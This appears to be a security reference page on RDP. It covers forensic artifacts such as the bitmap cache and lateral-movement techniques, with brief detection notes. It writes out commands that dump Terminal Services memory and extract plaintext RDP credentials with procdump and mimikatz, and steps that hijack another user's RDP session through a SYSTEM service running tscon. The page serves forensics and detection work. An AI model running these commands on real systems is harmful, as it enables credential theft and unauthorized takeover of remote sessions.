{% embed url="" %}
{% embed url="" %}
## Forensics:
### Souce and Destination artifacts:
### Bitmap Cache
{% embed url="" %}
{% embed url="" %}
Bitmap cache will cache still standing images of an RDP session so that they can be referenced instead of retransmitted. The purpose of this is to optimize RDP session.
We can leverage this artifact to collect what the TA saw during the RDP session. Useful for proving what a TA might've opened or actions they performed.
File Location:
* C:\Users\USERNAME\AppData\Local\Microsoft\Terminal Server Client\Cache\\\*
Cache files are stored in .bin files.
Execute bmc-tools:
```
bmc-tools.py -s ./ -d ./output
```
The output images will be saved to output folder.
We can then stitch together these image pieces using RDP Cache Sitcher.
{% embed url="" %}
Grab the compiled release version of the software and then open up the directory the image tiles are stored in. We can then stitch together tiles to make a complete image.
### RDP Clipbaord Forensics
{% embed url="" %}
## RDP Lateral Movement
RDP credentials are stored in LSASS of the target computer. The plaintext passwords can be dumped from LSASS using mimikatz.
Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account.
{% embed url="" %}
### Dump Passwords in Terminal Services:
1. Query svchost running Terminal Services.
```powershell
#service
sc queryex termservice
#task running rdpcorets
tasklist /M:rdpcorets.dll
#netstat for TermService
netstat -nob | Select-String TermService -Context 1
```
2. Dump process or select-string for password in memory.
```powershell
#select string for password hint, difficult to find unless you know it.
strings -el svchost* | grep Password123 -C3
#dump process with task manager or procdump
procdump64.exe -ma 988 -accepteula C:\Users\pentestlab
#mimikatz rdp extract
privilege::debug
ts::logonpasswords
```
#### Detection:
* Look for .dmp files on the host.
{% embed url="" %}
### Dump saved credentials via DPAPI:
Credential Manager Location:
* C:\Users\username\AppData\Local\Microsoft\Credentials
{% embed url="" %}
{% embed url="" %}
* Credentials are stored in Credential Manager, not in .rdp files.
* .rdp files reference credential manager for creds.
#### Detection:
*
### Tscon to hijack open RDP connections:
1. Requires SYSTEM privs to accomplish.
```powershell
psexec -s \\localhost cmd
```
\
Another method is to create a service that will connect selected session to ours.
2. Get all sessions information:
```powershell
C:\Windows\system32>query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
administrator 1 Disc 1 3/12/2017 3:07 PM
>localadmin rdp-tcp#55 2 Active . 3/12/2017 3:10 PM
C:\Windows\system32>
```
3. Create service which will hijack user's session:
```powershell
C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS
```
4. Start service:
```powershell
net setart sesshijack
```
#### Detection:
* Event IDS`4778` (logon) and`4779`(logoff) events can be used to figure out which desktop sessions got disconnected/reconnected.
* Tscon running as SYSTEM
* Tscon executed as SYSTEM from persistence method scheduled task, service, WMI, etc.
{% embed url="" %}
{% embed url="" %}
### Rogue RDP:
{% embed url="" %}
### RDP Files:
.rdp files are plaintext config files.
{% embed url="" %}
* Credentials are stored in Credential Manager, not in .rdp files.
* .rdp files reference credential manager for creds
{% embed url="" %}
## RDP Keyboard Layout:
{% embed url="" %}
## Anti-Forensics:
{% embed url="" %}
